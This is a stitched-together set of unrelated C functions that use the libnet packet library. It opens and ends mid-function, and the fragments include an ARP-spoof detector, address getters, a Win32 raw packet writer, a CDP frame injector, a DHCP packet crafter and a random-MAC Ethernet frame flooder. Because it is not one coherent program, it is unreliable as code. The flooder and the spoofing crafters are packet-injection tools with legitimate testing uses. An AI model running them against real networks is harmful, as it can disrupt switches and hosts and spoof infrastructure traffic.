you need to clean up arp cache manually. delete entry for SIP (%s) - SMAC (%s)\n", conf.a_sip, conf.a_sha); printf (" [+] to automate this process, please terminate this session and restart arp-secur" " in PREVENT mode, i.e with -P switch\n"); } else if (PREVENT == conf.mode) { printf (" [+] cleaning up arp cache by deleting entry for SIP (%s) - SMAC (%s)\n", conf.a_sip, conf.a_sha); cache_cleanup (conf.a_sip, conf.a_sha); } } else { printf (" [+] analyzed arp packet does not seem to be specially-crafted\n"); /* check if we have already processed (and validated) the ip-mac pair... */ if (0 < conf.queue_size) { printf (" [+] calling known-traffic-filter module to check if we have validated" " IP - MAC (%s - %s) pair earlier (queue_size: %d)\n", conf.a_sip, conf.a_sha, conf.queue_size); known_traffic_filter (start, conf.a_sip, conf.a_sha, conf.queue_size); } else { printf (" [+] no IP-MAC pairs have been validated yet (queue_size: %d)\n", conf.queue_size); } /* ...hmmm, seems to be a new mac-ip pair. let's validate it then... */ printf (" [+] calling spoof-detection module to validate IP - MAC (%s - %s) pair\n", conf.a_sip, conf.a_sha); valid = spoof_detector (conf, start, end); if (0 == valid) { printf ("\n [+] try other scan types before determining the validity of the IP - MAC (%s - %s)\n", conf.a_sip, conf.a_sha); if (DETECT == conf.mode) { printf (" [+] for safety reasons, you need to clean up arp cache manually." " delete entry for (%s - %s)\n", conf.a_sip, conf.a_sha); printf (" [+] to automate this process from now onwards," " restart arp-secur in PREVENT mode, i.e with -P switch\n"); } else if (PREVENT == conf.mode) { printf (" [+] cleaning up arp cache by deleting entry for SIP (%s) - SMAC (%s)\n", conf.a_sip, conf.a_sha); cache_cleanup (conf.a_sip, conf.a_sha); } } /* display session summary in a system popup notification */ if (1 == showpopup) { alert (conf.a_sip, conf.a_sha, valid); } /* end repeat loop */ /* end arp-secur session */ bcurtime = time (NULL); bloctime = localtime (&bcurtime); strftime (end_time, 24, "%d/%b/%Y %H:%M:%S", bloctime); printf ("\n [+] session finished at %s\n\n", end_time); } return 0; }//main
int main(int argc, char *argv[]) { int c; char errbuf[256]; char *device = NULL; struct libnet_link_int *l; struct ether_addr *e; u_long i; while ((c = getopt(argc, argv, "i:")) != EOF) { switch (c) { case 'i': device = optarg; break; default: exit(EXIT_FAILURE); } } if (!device) { fprintf(stderr, "Specify a device\n"); exit(EXIT_FAILURE); } l = libnet_open_link_interface(device, errbuf); if (!l) { fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf); exit(EXIT_FAILURE); } printf("Interface %s\n", device); e = libnet_get_hwaddr(l, device, errbuf); if (!e) { fprintf(stderr, "Can't get hardware address: %s\n", errbuf); exit(EXIT_FAILURE); } else { printf("MAC address: "); for (c = 0; c < 6; c++) { printf("%x", e->ether_addr_octet[c]); if (c != 5) { printf(":"); } } printf("\n"); } i = libnet_get_ipaddr(l, device, errbuf); if (!i) { fprintf(stderr, "Can't get ip address: %s\n", errbuf); exit(EXIT_FAILURE); } else { printf("IP address: "); printf("%s\n", libnet_host_lookup(ntohl(i), 0)); } exit(EXIT_SUCCESS); }
int libnet_win32_write_raw_ipv4(libnet_t *l, const uint8_t *payload, uint32_t payload_s) { static BYTE dst[ETHER_ADDR_LEN]; static BYTE src[ETHER_ADDR_LEN]; uint8_t *packet = NULL; uint32_t packet_s; LPPACKET lpPacket = NULL; DWORD remoteip = 0; DWORD BytesTransfered; NetType type; struct libnet_ipv4_hdr *ip_hdr = NULL; memset(dst, 0, sizeof(dst)); memset(src, 0, sizeof(src)); packet_s = payload_s + l->link_offset; packet = (uint8_t *)malloc(packet_s); if (packet == NULL) { snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): failed to allocate packet\n", __func__); return (-1); } /* we have to do the IP checksum */ if (libnet_do_checksum(l, payload, IPPROTO_IP, LIBNET_IPV4_H) == -1) { /* error msg set in libnet_do_checksum */ return (-1); } /* MACs, IPs and other stuff... */ ip_hdr = (struct libnet_ipv4_hdr *)payload; memcpy(src, libnet_get_hwaddr(l), sizeof(src)); remoteip = ip_hdr->ip_dst.S_un.S_addr; /* check if the remote station is the local station */ if (remoteip == libnet_get_ipaddr4(l)) { memcpy(dst, src, sizeof(dst)); } else { memcpy(dst, libnet_win32_get_remote_mac(l, remoteip), sizeof(dst)); } PacketGetNetType(l->lpAdapter, &type); switch(type.LinkType) { case NdisMedium802_3: libnet_win32_build_fake_ethernet(dst, src, ETHERTYPE_IP, payload, payload_s, packet, l , 0); break; case NdisMedium802_5: libnet_win32_build_fake_token(dst, src, ETHERTYPE_IP, payload, payload_s, packet, l, 0); break; case NdisMediumFddi: break; case NdisMediumWan: case NdisMediumAtm: case NdisMediumArcnet878_2: default: snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): network type (%d) is not supported\n", __func__, type.LinkType); return (-1); break; } BytesTransfered = -1; if ((lpPacket = PacketAllocatePacket()) == NULL) { snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): failed to allocate the LPPACKET structure\n", __func__); return (-1); } PacketInitPacket(lpPacket, packet, packet_s); /* PacketSendPacket returns a BOOLEAN */ if (PacketSendPacket(l->lpAdapter, lpPacket, TRUE)) { BytesTransfered = packet_s; } PacketFreePacket(lpPacket); free(packet); return (BytesTransfered); }
int main(int argc, char *argv[]) { int c, len, index; libnet_t *l; libnet_ptag_t t; u_char *value; u_char values[100]; u_short tmp; char errbuf[LIBNET_ERRBUF_SIZE]; u_int8_t oui[3] = { 0x00, 0x00, 0x0c }; u_int8_t cdp_mac[6] = {0x01, 0x0, 0xc, 0xcc, 0xcc, 0xcc}; if (argc != 3) { fprintf(stderr, "usage %s device device-id\n", argv[0]); return (EXIT_FAILURE); } fprintf(stderr, "cdppoke...\n"); l = libnet_init(LIBNET_LINK, argv[1], errbuf); if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); return (EXIT_FAILURE); } /* build the TLV's by hand until we get something better */ memset(values, 0, sizeof(values)); index = 0; tmp = htons(LIBNET_CDP_VERSION); memcpy(values, &tmp, 2); index += 2; tmp = htons(9); /* length of string below plus type and length fields */ memcpy(values + index, &tmp, 2); index += 2; memcpy(values + index, (u_char *)"1.1.1", 5); index += 5; /* this TLV is handled by the libnet builder */ value = argv[2]; len = strlen(argv[2]); /* build CDP header */ t = libnet_build_cdp( 1, /* version */ 30, /* time to live */ 0x0, /* checksum */ 0x1, /* type */ len, /* length */ value, /* value */ values, /* payload */ index, /* payload size */ l, /* libnet context */ 0); /* libnet ptag */ if (t == -1) { fprintf(stderr, "Can't build CDP header: %s\n", libnet_geterror(l)); goto bad; } /* build 802.2 header */ t = libnet_build_802_2snap( LIBNET_SAP_SNAP, /* SAP SNAP code */ LIBNET_SAP_SNAP, /* SAP SNAP code */ 0x03, /* control */ oui, /* OUI */ 0x2000, /* upper layer protocol type */ NULL, /* payload */ 0, /* payload size */ l, /* libnet context */ 0); /* libnet ptag */ if (t == -1) { fprintf(stderr, "Can't build SNAP header: %s\n", libnet_geterror(l)); goto bad; } /* build 802.3 header */ t = libnet_build_802_3( cdp_mac, /* ethernet destination */ (u_int8_t *)libnet_get_hwaddr(l), /* ethernet source */ LIBNET_802_2_H + LIBNET_802_2SNAP_H + LIBNET_CDP_H, /* packet len */ NULL, /* payload */ 0, /* payload size */ l, /* libnet context */ 0); /* libnet ptag */ if (t == -1) { fprintf(stderr, "Can't build 802.3 header: %s\n", libnet_geterror(l)); goto bad; } /* write the packet out */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte CDP frame \"%s\"\n", c, argv[2]); } libnet_destroy(l); return (EXIT_SUCCESS); bad: libnet_destroy(l); return (EXIT_FAILURE); }
int main(int argc, char **argv) { int ch, dhcp_payload_len; unsigned char *dhcp_payload; libnet_ptag_t ptag_dhcpv4, ptag_udp, ptag_ipv4, ptag_ethernet; char *arg_secs, *arg_cip, *arg_chaddr, *arg_sip, *arg_ifname; char *arg_operation, *arg_timeout, *arg_xid, *arg_flags, *arg_yip; char *arg_gip, *arg_sname, *arg_fname, *arg_ether_dst, *stmp; char *arg_ipv4_src, *arg_ipv4_dst, *arg_ipv4_tos, *arg_ipv4_ttl; char *arg_reply_count; if (argc < 2) usage("too few arguments"); srandom(time(NULL)); arg_secs = arg_cip = arg_chaddr = arg_sip = arg_ifname = NULL; arg_operation = arg_timeout = arg_xid = arg_flags = arg_yip = NULL; arg_gip = arg_sname = arg_fname = arg_ether_dst = arg_reply_count = NULL; arg_ipv4_src = arg_ipv4_dst = arg_ipv4_tos = arg_ipv4_ttl = NULL; verbosity = 1; while ((ch = getopt(argc, argv, "s:c:h:i:o:t:x:f:y:g:S:A:B:O:X:v:F:T:L:Q:E:w:n:m")) != -1) { switch (ch) { case 's': arg_secs = optarg; break; case 'c': arg_cip = optarg; break; case 'h': arg_chaddr = optarg; break; case 'S': arg_sip = optarg; break; case 'i': arg_ifname = optarg; break; case 'o': arg_operation = optarg; break; case 't': arg_timeout = optarg; break; case 'x': arg_xid = optarg; break; case 'f': arg_flags = optarg; break; case 'y': arg_yip = optarg; break; case 'B': arg_fname = optarg; break; case 'A': arg_sname = optarg; break; case 'g': arg_gip = optarg; break; case 'F': arg_ipv4_src = optarg; break; case 'T': arg_ipv4_dst = optarg; break; case 'L': arg_ipv4_ttl = optarg; break; case 'Q': arg_ipv4_tos = optarg; break; case 'n': arg_reply_count = optarg; break; case 'E': arg_ether_dst = optarg; break; case 'v': verbosity = atoi(optarg); break; case 'm': no_double_options = 0; break; case 'O': add_option(optarg); break; case 'X': add_hexoption(optarg); break; case 'w': option_lookup(optarg); break; case '?': default: usage("unknown argument"); } } argc -= optind; argv += optind; /* Set some basic defaults */ set_defaults(); /* Make sure network interface was specified with -i option */ if (arg_ifname == NULL) { usage("Error: network interface (-i option) not specified."); } strncpy(ifname, arg_ifname, 99); /* Try to have pcap and libnet use the interface */ pcp = pcap_open_live(ifname, SNAPLEN, 1, 1, pcap_errbuf); if (pcp == NULL) { printf("pcap_open_live(%s) failed! Did you give the right interface name " "and are you root?\n", ifname); printf("pcap said: %s\n", pcap_errbuf); exit(1); } lnp = libnet_init(LIBNET_LINK, ifname, libnet_errbuf); if (lnp == NULL) { printf("libnet_init(%s) failed!\n", ifname); printf("libnet said: %s\n", libnet_errbuf); exit(1); } /* Set chaddr MAC address */ if (arg_chaddr != NULL) { int len = ETHER_ADDR_LEN; /*chaddr = libnet_hex_aton((int8_t *)arg_chaddr, &len);*/ chaddr = libnet_hex_aton(arg_chaddr, &len); if (chaddr == NULL) { if (verbosity > 0) printf("Invalid chaddr MAC address specified (%s)\n", arg_chaddr); exit(1); } } else { /* Try to retrieve MAC address using libnet */ chaddr = (u_int8_t *)libnet_get_hwaddr(lnp); if (chaddr == NULL) { if (verbosity > 1) { printf("Failed to retrieve MAC address for interface %s, using 0:0:0:0:0:0\n" "Libnet said: %s\n", ifname, libnet_errbuf); } memset(chaddr, 0, ETHER_ADDR_LEN); } } /* Set cip address */ if (arg_cip != NULL) { cip = inet_addr(arg_cip); if (cip == INADDR_NONE) { if (verbosity > 0) printf("Invalid cip address specified (%s)\n", arg_cip); exit(1); } cip = ntohl(cip); } else { /* Try to retrieve IP address using libnet */ cip = libnet_get_ipaddr4(lnp); if ((int)cip == -1) { if (verbosity > 1) { printf("Failed to retrieve IPv4 address for interface %s, using cip 0.0.0.0\n" "Libnet said: %s\n", ifname, libnet_errbuf); } cip = inet_addr("0.0.0.0"); } else cip = htonl(cip); } /**************************/ /* Set various parameters */ /**************************/ if (arg_operation != NULL) { if (option_added(LIBNET_DHCP_MESSAGETYPE) && no_double_options) { if (verbosity > 0) { printf("Error: DHCP messagetype specified twice (don't use -o option if\n" " you also intend to use -O to set option 53 (messagetype))\n"); } exit(1); } if (strcasecmp(arg_operation, "discover") == 0) { operation = LIBNET_DHCP_MSGDISCOVER; if (arg_timeout == NULL) timeout = 5; } else if (strcasecmp(arg_operation, "request") == 0) { operation = LIBNET_DHCP_MSGREQUEST; if (arg_timeout == NULL) timeout = 5; } else if (strcasecmp(arg_operation, "inform") == 0) { operation = LIBNET_DHCP_MSGINFORM; if (timeout == 0) timeout = 5; } else if (strcasecmp(arg_operation, "release") == 0) operation = LIBNET_DHCP_MSGRELEASE; else if (strcasecmp(arg_operation, "decline") == 0) operation = LIBNET_DHCP_MSGDECLINE; else { if (verbosity > 0) usage("Invalid DHCP operation type"); else exit(1); } /* Add MESSAGETYPE DHCP option */ num_options++; options = (struct dhcp_option *) realloc(options, num_options * sizeof(struct dhcp_option)); options[num_options-1].opnum = LIBNET_DHCP_MESSAGETYPE; options[num_options-1].oplen = 1; options[num_options-1].opdata[0] = operation; } else { /* no "-o operation" argument given */ if (option_added(LIBNET_DHCP_MESSAGETYPE) == 0) { /* Add MESSAGETYPE DHCP option */ num_options++; options = (struct dhcp_option *) realloc(options, num_options * sizeof(struct dhcp_option)); options[num_options-1].opnum = LIBNET_DHCP_MESSAGETYPE; options[num_options-1].oplen = 1; options[num_options-1].opdata[0] = operation; } } if (arg_secs != NULL) { unsigned long ultmp; ultmp = strtoul(arg_secs, &stmp, 0); if (*stmp != '\0' || ultmp > 65535) { if (verbosity > 0) printf("Error: secs must be 0-65535 (was: %s)\n", arg_secs); exit(1); } secs = (u_int16_t)ultmp; } if (arg_timeout != NULL) { timeout = strtoul(arg_timeout, &stmp, 0); if (*stmp != '\0') { if (verbosity > 0) printf("Error: timeout value must be 0 or a positive integer (was: %s)\n", arg_timeout); exit(1); } } if (arg_reply_count != NULL) { reply_count = strtoul(arg_reply_count, &stmp, 0); if (*stmp != '\0') { if (verbosity > 0) printf("Error: reply_count value must be 0 or a positive integer (was: %s)\n", arg_reply_count); exit(1); } } if (arg_xid != NULL) { xid = strtoul(arg_xid, &stmp, 0); if (*stmp != '\0') { if (verbosity > 0) printf("Error: xid value must be 0 or a positive integer (was: %s)\n", arg_xid); exit(1); } } if (arg_flags != NULL) { unsigned long ultmp; ultmp = strtoul(arg_flags, &stmp, 0); if (*stmp != '\0' || ultmp > 65535) { if (verbosity > 0) printf("Error: flags value must be 0-65535 (was: %s)\n", arg_flags); exit(1); } flags = (u_int16_t)ultmp; } if (arg_sip != NULL) { sip = inet_addr(arg_sip); if (sip == INADDR_NONE) { if (verbosity > 0) printf("Error: specified sip value is not a valid IPv4 address (was: %s)\n", arg_sip); exit(1); } } if (arg_yip != NULL) { yip = inet_addr(arg_yip); if (yip == INADDR_NONE) { if (verbosity > 0) printf("Error: specified yip value is not a valid IPv4 address (was: %s)\n", arg_yip); exit(1); } } if (arg_gip != NULL) { gip = inet_addr(arg_gip); if (gip == INADDR_NONE) { if (verbosity > 0) printf("Error: specified gip value is not a valid IPv4 address (was: %s)\n", arg_gip); exit(1); } } if (arg_fname != NULL) { fname = (char *)malloc(strlen(fname)+1); strcpy(fname, arg_fname); } if (arg_sname != NULL) { sname = (char *)malloc(strlen(sname)+1); strcpy(sname, arg_sname); } if (arg_ipv4_src != NULL) { ipv4_src = inet_addr(arg_ipv4_src); if (ipv4_src == INADDR_NONE) { if (verbosity > 0) printf("Error: specified ipv4_src value is not a valid IPv4 address (was: %s)\n", arg_ipv4_src); exit(1); } } if (arg_ipv4_dst != NULL) { ipv4_dst = inet_addr(arg_ipv4_dst); if (ipv4_dst == INADDR_NONE) { if (verbosity > 0) printf("Error: specified ipv4_dst value is not a valid IPv4 address (was: %s)\n", arg_ipv4_dst); exit(1); } } if (arg_ipv4_ttl != NULL) { unsigned long ultmp; ultmp = strtoul(arg_ipv4_ttl, &stmp, 0); if (*stmp != '\0' || ultmp > 255) { if (verbosity > 0) printf("Error: ipv4_ttl value must be 0-255 (was: %s)\n", arg_xid); exit(1); } ipv4_ttl = (u_int8_t)ultmp; } if (arg_ipv4_tos != NULL) { unsigned long ultmp; ultmp = strtoul(arg_ipv4_tos, &stmp, 0); if (*stmp != '\0' || ultmp > 255) { if (verbosity > 0) printf("Error: ipv4_tos value must be 0-255 (was: %s)\n", arg_ipv4_tos); exit(1); } ipv4_tos = (u_int8_t)ultmp; } if (arg_ether_dst != NULL) { int l = ETHER_ADDR_LEN; /*ether_dst = libnet_hex_aton((int8_t *)arg_ether_dst, &l);*/ ether_dst = libnet_hex_aton(arg_ether_dst, &l); if (ether_dst == NULL) { if (verbosity > 0) printf("Error: invalid ethernet destination MAC specified (was: %s)\n", arg_ether_dst); exit(1); } } /****************************** * Done setting parameters. * * Start building DHCP packet * ******************************/ libnet_clear_packet(lnp); /* Build DHCP payload (DHCP options section) */ dhcp_payload = build_payload(&dhcp_payload_len); /* Create DHCP message */ ptag_dhcpv4 = libnet_build_dhcpv4(LIBNET_DHCP_REQUEST, BOOTP_HTYPE_ETHER, ETHER_ADDR_LEN, BOOTP_HOPCOUNT, xid, secs, flags, cip, yip, sip, gip, chaddr, sname, fname, dhcp_payload, dhcp_payload_len, lnp, 0); if (ptag_dhcpv4 == -1) { printf("Failed to build bootp packet: %s\n", libnet_errbuf); exit(1); } /* libnet_ptag_t libnet_build_udp(u_int16_t sp, u_int16_t dp, u_int16_t len, u_int16_t sum, u_int8_t *payload, u_int32_t payload_s, libnet_t *l, libnet_ptag_t ptag); */ /* Create UDP datagram */ ptag_udp = libnet_build_udp(UDP_SRCPORT, UDP_DSTPORT, dhcp_payload_len + LIBNET_DHCPV4_H + LIBNET_UDP_H, 0, NULL, 0, lnp, 0); if (ptag_udp == -1) { printf("Failed to build udp packet: %s\n", libnet_errbuf); exit(1); } /* libnet_ptag_t libnet_build_ipv4(u_int16_t len, u_int8_t tos, u_int16_t id, u_int16_t frag, u_int8_t ttl, u_int8_t prot, u_int16_t sum, u_int32_t src, u_int32_t dst, u_int8_t *payload, u_int32_t payload_s, libnet_t *l, libnet_ptag_t ptag); */ /* Create IPv4 datagram */ ptag_ipv4 = libnet_build_ipv4(dhcp_payload_len + LIBNET_DHCPV4_H + LIBNET_UDP_H + LIBNET_IPV4_H, ipv4_tos, ipv4_id++, 0, ipv4_ttl, IPPROTO_UDP, 0, ipv4_src, ipv4_dst, NULL, 0, lnp, 0); if (ptag_ipv4 == -1) { printf("Failed to build ipv4 packet: %s\n", libnet_errbuf); exit(1); } /* Create ethernet packet */ ptag_ethernet = libnet_autobuild_ethernet(ether_dst, ETHERTYPE_IP, lnp); if (ptag_ethernet == -1) { printf("Failed to build ethernet packet: %s\n", libnet_errbuf); exit(1); } /* Write packet to network */ if (libnet_write(lnp) == -1) { printf("Failed to write ethernet packet to network: %s\n", libnet_errbuf); exit(1); } /* If we have to wait and listen for server replies, we use a timer and a signal handler to quit. We do this as libpcap doesn't support non-blocking packet capture on some (many?) platforms. We could have launched another thread also, but using timers and signals is simpler. */ if (timeout > 0) { struct itimerval itv; itv.it_interval.tv_sec = itv.it_value.tv_sec = timeout; itv.it_interval.tv_usec = itv.it_value.tv_usec = 0; setitimer(ITIMER_REAL, &itv, NULL); signal(SIGALRM, sighandler); pcap_loop(pcp, -1, pcap_callback, NULL); } libnet_destroy(lnp); pcap_close(pcp); exit(0); }
int main(int argc, char **argv) { u_char compare[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; u_char dhost[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; u_char shost[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; struct ether_header *ether = NULL; u_int16_t proto = htons(ETHERTYPE_IP); struct ether_addr *ea = NULL; u_int16_t *data = NULL; char dev[128] = ""; u_char *buf = NULL; int proto_rand = 0; struct timeval tv, tv2; int max_len = ETHER_FRAME_SIZE; u_long count = 0xffffffffl; u_long data_pushed = 0; struct ip *ip = NULL; u_long data_len = 0; int rand_source = 0; int rand_dest = 0; long mark = 1000; u_long skip = 0; /* Skip how many packets */ u_long acx = 0; int debug = 0; u_int len = 0; u_int cx = 0; float sec; int seed; u_int c; /* libnet variables */ char errbuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; seed = getpid(); while((c=getopt(argc, argv, "hi:s:d:k:p:r:c:l:Dvm:")) != (unsigned) EOF) { switch (c) { case 'i': if (rindex(optarg, '/')) strncpy(dev, (char *) rindex(optarg, '/')+1, 128); else strncpy(dev, optarg, 128); dev[127] = '\0'; break; case 's': if ( strcmp(optarg, "rand") == 0 ) { printf("Using random source MAC's\n"); shost[0] = 0xff; rand_source = 1; break; } bcopy(atoether(optarg), shost, 6); break; case 'd': if ( strcmp(optarg, "rand") == 0 ) { printf("Using random destination MAC's\n"); dhost[0] = 0xff; rand_dest = 1; break; } bcopy(atoether(optarg), dhost, 6); break; case 'r': seed = atoi(optarg); break; case 'c': count = atol(optarg); break; case 'm': mark = atol(optarg); if (mark <= 0) exit(printf("Please use a positive arg for -m\n")); break; case 'k': skip = atol(optarg); printf("Will not transmit first %li packet(s).\n", skip); break; case 'D': debug++; break; case 'l': max_len = atoi(optarg); if ( max_len > 1500 ) { printf("Maximum Length of %i is longer than the max " "ethernet frame size of %i\n", max_len, ETHER_FRAME_SIZE); exit(0); } if ( max_len < 14) { printf("You seam to have entered %i as the maximum " "length... Please make it >= 14\n", max_len); exit(0); } break; case 'p': if ( strcasecmp(optarg, "rand") == 0 ) { proto_rand++; break; } proto_rand = 0; proto = htons(atoi(optarg)); break; case 'v': printf("Version %s\n", VERSION); exit(0); case 'h': default: usage(argv[0]); exit( 0 ); } } if ( *dev == '\0' ) { usage(argv[0]); exit( 0 ); } /* Initialize libnet context, Root priviledges are required.*/ l = libnet_init( LIBNET_LINK_ADV, /* injection type */ dev, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "Can not initialize libnet: %s", errbuf); exit( -1 ); } max_len -= 6 + 6 + 2; printf("Seeding with %i\n", seed); srand(seed); if ( (buf = malloc(ETHER_FRAME_SIZE)) == NULL ) { perror("malloc"); exit( -1 ); } bzero(buf, ETHER_FRAME_SIZE); ether = (struct ether_header *) buf; if ( bcmp(dhost, compare, 6) == 0 ) memset(ether->ether_dhost, 0xff, 6); else bcopy(dhost, ether->ether_dhost, 6); if ( bcmp(shost, compare, 6) == 0 ) { if ( (ea = (struct ether_addr *)libnet_get_hwaddr(l)) == 0 ) fprintf(stderr, "Cannot get MAC for %s: %s", dev, libnet_geterror(l)); bcopy(ea, ether->ether_shost, 6); } else bcopy(shost, ether->ether_shost, 6); printf("Maximum packet size (minus header) is %i bytes\n", max_len); if ( proto_rand ) printf("Ethernet protocols will be randomized.\n"); else printf("Ethernet protocol will be %i.\n", ntohs(proto)); if ( !rand_dest ) printf("Sending to MAC %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n", ether->ether_dhost[0], ether->ether_dhost[1], ether->ether_dhost[2], ether->ether_dhost[3], ether->ether_dhost[4], ether->ether_dhost[5]); else printf("Sending to random MAC addresses.\n"); if ( !rand_source ) printf("Sending from MAC %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n", ether->ether_shost[0], ether->ether_shost[1], ether->ether_shost[2], ether->ether_shost[3], ether->ether_shost[4], ether->ether_shost[5]); else printf("Sending from random MAC addresses.\n"); ip = (struct ip *) (buf + 14); data = (u_int16_t *) (buf + 14); printf("Sending...\n"); gettimeofday(&tv, NULL); for ( acx = 1; acx <= count; acx++ ) { len = sizeof(struct ether_header); if ( rand_source ) { ((u_int16_t *) ether->ether_shost)[0] = RAND16; ((u_int16_t *) ether->ether_shost)[1] = RAND16; ((u_int16_t *) ether->ether_shost)[2] = RAND16; } if ( rand_dest ) { ((u_int16_t *) ether->ether_dhost)[0] = RAND16; ((u_int16_t *) ether->ether_dhost)[1] = RAND16; ((u_int16_t *) ether->ether_dhost)[2] = RAND16; } if ( proto_rand ) ether->ether_type = RAND16; else ether->ether_type = proto; data_len = (u_int) (max_len * (rand()/((float) RAND_MAX + 1))); data_len >>= 1; for ( cx = 0; cx < data_len; cx++ ) data[cx] = RAND16; data_len <<= 1; if ( rand() & 0x1 ) { data_len++; data[cx] = RAND16; } len += data_len; ip->ip_len = htons(data_len); ip->ip_sum = 0; libnet_do_checksum(l, (u_int8_t *) ip, IPPROTO_IP, data_len); if ( debug ) { printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x -> ", ether->ether_shost[0], ether->ether_shost[1], ether->ether_shost[2], ether->ether_shost[3], ether->ether_shost[4], ether->ether_shost[5]); printf("%.2x:%.2x:%.2x:%.2x:%.2x:%.2x\t", ether->ether_dhost[0], ether->ether_dhost[1], ether->ether_dhost[2], ether->ether_dhost[3], ether->ether_dhost[4], ether->ether_dhost[5]); switch( ntohs(ether->ether_type) ) { case ETHERTYPE_IP: printf("Proto IP \t"); break; case ETHERTYPE_ARP: printf("Proto ARP \t"); break; case ETHERTYPE_PUP: printf("Proto PUP \t"); break; case ETHERTYPE_REVARP: printf("Proto RARP\t"); break; case ETHERTYPE_VLAN: printf("Proto VLAN\t"); break; default: printf("Proto %u\t", ntohs(ether->ether_type)); } printf("Length %i\n", len); } if ( acx >= skip ) { c = libnet_adv_write_link(l, buf, len); if (c !=(u_int) -1) data_pushed += c; } /* if ( c != len ) * perror("write_ll"); */ if ( !(acx % mark) ) { gettimeofday(&tv2, NULL); sec = (tv2.tv_sec - tv.tv_sec) - (tv.tv_usec - tv2.tv_usec) / 1000000.0; printf(" %8lu @ %.1f pkts/sec and %.1f k/s\n", acx, mark/sec, (data_pushed/1024.0)/sec ); data_pushed = 0; gettimeofday(&tv, NULL); } } if ((acx-1) % mark) { /* There is a remainder */ gettimeofday(&tv2, NULL); sec = (tv2.tv_sec - tv.tv_sec) - (tv.tv_usec - tv2.tv_usec) / 1000000.0; printf(" %8lu @ %.1f pkts/sec and %.1f k/s\n", acx-1, ((acx-1) % mark)/sec, (data_pushed/1024.0)/sec ); } libnet_destroy(l); free( buf ); return ( 0 ); }
int main(int argc, char *argv[]) { int c; u_long i; libnet_t *l; char *device = NULL; struct libnet_ether_addr *e; char errbuf[LIBNET_ERRBUF_SIZE]; printf("libnet 1.1 address getter\n"); while ((c = getopt(argc, argv, "i:")) != EOF) { switch (c) { case 'i': device = optarg; break; default: exit(EXIT_FAILURE); } } /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_LINK, /* injection type */ device, /* network interface */ errbuf); /* errbuf */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } printf("Interface %s\n", libnet_getdevice(l)); e = libnet_get_hwaddr(l); if (e == NULL) { fprintf(stderr, "Can't get hardware address: %s\n", libnet_geterror(l)); } else { printf("MAC address: "); for (c = 0; c < 6; c++) { printf("%x", e->ether_addr_octet[c]); if (c != 5) { printf(":"); } } printf("\n"); } i = libnet_get_ipaddr4(l); if (i == -1) { fprintf(stderr, "Can't get ip address: %s\n", libnet_geterror(l)); } else { printf("IP address: "); printf("%s\n", libnet_addr2name4(i, LIBNET_DONT_RESOLVE)); } exit(EXIT_SUCCESS); }
void get_hw_info(void) { u_long ip; struct libnet_ether_addr *ea; bpf_u_int32 network, netmask; char pcap_errbuf[PCAP_ERRBUF_SIZE]; /* * dont touch the interface reading from file. * ...and if lnet_L3 is NULL we are sure that * unoffensive mode is on */ if (!GBL_LNET->lnet_L3 || GBL_OPTIONS->read) { DEBUG_MSG("get_hw_info: skipping... (not initialized)"); return; } DEBUG_MSG("get_hw_info"); /* get the ip address */ ip = libnet_get_ipaddr4(GBL_LNET->lnet_L3); /* if ip is equal to -1 there was an error */ if (ip != (u_long)~0) { /* the interface has an ip address */ if (ip != 0) GBL_IFACE->configured = 1; /* save the ip address */ ip_addr_init(&GBL_IFACE->ip, AF_INET, (char *)&ip); if (pcap_lookupnet(GBL_OPTIONS->iface, &network, &netmask, pcap_errbuf) == -1) ERROR_MSG("%s", pcap_errbuf); ip_addr_init(&GBL_IFACE->network, AF_INET, (char *)&network); /* the user has specified a different netmask, use it */ if (GBL_OPTIONS->netmask) { struct in_addr net; /* sanity check */ if (inet_aton(GBL_OPTIONS->netmask, &net) == 0) FATAL_ERROR("Invalid netmask %s", GBL_OPTIONS->netmask); ip_addr_init(&GBL_IFACE->netmask, AF_INET, (char *)&net); } else ip_addr_init(&GBL_IFACE->netmask, AF_INET, (char *)&netmask); } else DEBUG_MSG("get_hw_info: NO IP on %s", GBL_OPTIONS->iface); /* get the mac address */ ea = libnet_get_hwaddr(GBL_LNET->lnet); if (ea != NULL) memcpy(GBL_IFACE->mac, ea->ether_addr_octet, MEDIA_ADDR_LEN); else DEBUG_MSG("get_hw_info: NO MAC for %s", GBL_OPTIONS->iface); /* get the MTU */ GBL_IFACE->mtu = get_iface_mtu(GBL_OPTIONS->iface); /* check the mtu */ if (GBL_IFACE->mtu > INT16_MAX) FATAL_ERROR("MTU too large"); USER_MSG("%6s ->\t%s ", GBL_OPTIONS->iface, mac_addr_ntoa(GBL_IFACE->mac, pcap_errbuf)); USER_MSG("%16s ", ip_addr_ntoa(&GBL_IFACE->ip, pcap_errbuf)); USER_MSG("%16s\n\n", ip_addr_ntoa(&GBL_IFACE->netmask, pcap_errbuf) ); /* if not in bridged sniffing, return */ if (GBL_SNIFF->type != SM_BRIDGED) return; ip = libnet_get_ipaddr4(GBL_LNET->lnet_bridge); /* if ip is equal to -1 there was an error */ if (ip != (u_long)~0) { ip_addr_init(&GBL_BRIDGE->ip, AF_INET, (char *)&ip); if (pcap_lookupnet(GBL_OPTIONS->iface_bridge, &network, &netmask, pcap_errbuf) == -1) ERROR_MSG("%s", pcap_errbuf); ip_addr_init(&GBL_BRIDGE->network, AF_INET, (char *)&network); ip_addr_init(&GBL_BRIDGE->netmask, AF_INET, (char *)&netmask); } else DEBUG_MSG("get_hw_info: NO IP on %s", GBL_OPTIONS->iface_bridge); ea = libnet_get_hwaddr(GBL_LNET->lnet_bridge); if (ea != NULL) 